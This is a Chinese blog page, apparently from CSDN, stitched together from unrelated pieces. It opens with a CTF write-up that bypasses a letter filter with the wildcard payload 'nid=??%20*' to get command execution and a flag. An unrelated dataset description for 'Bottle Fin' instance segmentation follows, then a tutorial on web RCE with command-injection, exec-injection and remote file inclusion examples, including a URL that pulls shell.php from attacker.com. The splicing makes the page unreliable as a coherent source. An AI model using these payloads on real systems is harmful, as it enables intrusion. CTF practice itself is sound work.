[web]-rce-刀塔

打开网站,flag.php,点开后发现是乱码。用Hex显示,也无法解码。

查看源代码发现有不少提交参数的地方,考虑sql注入和命令执行

没有sql注入提示的线索。考虑命令执行吧

http://172.30.0.8/index.php?act=news&nid=*%20/*

nid参数输入ls,提示非法输入,不能接受字母,输入通配符*,能够返回,超过5个*也会提示非法操作

设置如下payload: act=news&nid=??%20*

flag : ef167fd977019c10e6aa761a419c5240

一、基础信息 数据集名称:Bottle Fin实例分割数据集 图片数量: 训练集:4418张图片 验证集:1104张图片 总计:5522张图片 分类类别: - 类别0: 数字0 - 类别1: 数字1 - 类别2: 数字2 - 类别3: 数字3 - 类别4: 数字4 - 类别5: 数字5 - 类别6: Bottle Fin 标注格式:YOLO格式,包含多边形坐标,适用于实例分割任务。 数据格式:图片格式常见如JPEG或PNG,具体未指定。 二、适用场景 实例分割AI模型开发:数据集支持实例分割任务,帮助构建能够精确识别和分割图像中多个对象的AI模型,适用于对象检测和分割应用。 工业自动化与质量控制:可能应用于制造、物流或零售领域,用于自动化检测和分类物体,提升生产效率。 计算机视觉研究:支持实例分割算法的学术研究,促进目标检测和分割技术的创新。 教育与实践培训:可用于高校或培训机构的计算机视觉课程,作为实例分割任务的实践资源,帮助学生理解多类别分割。 三、数据集优势 多类别设计:包含7个不同类别,涵盖数字和Bottle Fin对象,增强模型对多样对象的识别和分割能力。 高质量标注:标注采用YOLO格式的多边形坐标,确保分割边界的精确性,提升模型训练效果。 数据规模适中:拥有超过5500张图片,提供充足的样本用于模型训练和验证,支持稳健的AI开发。 即插即用兼容性:标注格式直接兼容主流深度学习框架(如YOLO),便于快速集成到各种实例分割项目中。
仅给定的引用内容未涉及polarctf-web-rce相关信息。一般而言,Web RCE(Remote Code Execution,远程代码执行)漏洞是一种严重的安全漏洞,攻击者可利用该漏洞在目标Web服务器上远程执行任意代码。 在CTF竞赛中,针对Web RCE漏洞的利用方法通常有以下几种: - **命令注入**:若Web应用程序在处理用户输入时未进行严格过滤和验证,攻击者可通过构造恶意输入,将系统命令注入到应用程序调用的命令中执行。例如,在一个接受用户输入作为系统命令参数的PHP页面中,攻击者可构造类似 `;ls -l` 的输入来执行 `ls -l` 命令。示例代码如下: ```php <?php $input = $_GET['input']; system("ping -c 4 " . $input); ?> ``` 攻击者可通过构造URL `http://example.com/test.php?input=127.0.0.1;ls -l` 来执行 `ls -l` 命令。 - **代码注入**:当Web应用程序动态执行用户提供的代码时,攻击者可注入恶意代码。比如在一个支持用户输入Python代码并执行的页面中,攻击者可输入恶意的Python代码来获取系统信息或执行其他操作。示例代码如下: ```python code = input("请输入Python代码:") exec(code) ``` 攻击者可输入 `import os;os.system('ls -l')` 来执行 `ls -l` 命令。 - **文件包含漏洞利用**:若Web应用程序存在文件包含漏洞,攻击者可通过包含恶意文件来执行代码。例如,在一个PHP应用中,若存在如下代码: ```php <?php $file = $_GET['file']; include($file); ?> ``` 攻击者可构造URL `http://example.com/test.php?file=http://attacker.com/shell.php` 来包含并执行攻击者服务器上的恶意PHP文件。 在polarctf中,要发现和利用Web RCE漏洞,通常需要对Web应用进行全面的安全测试,包括对输入点的测试、对应用程序代码的审计等。同时,还需要了解目标应用所使用的技术栈和环境,以便更精准地发现和利用漏洞。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值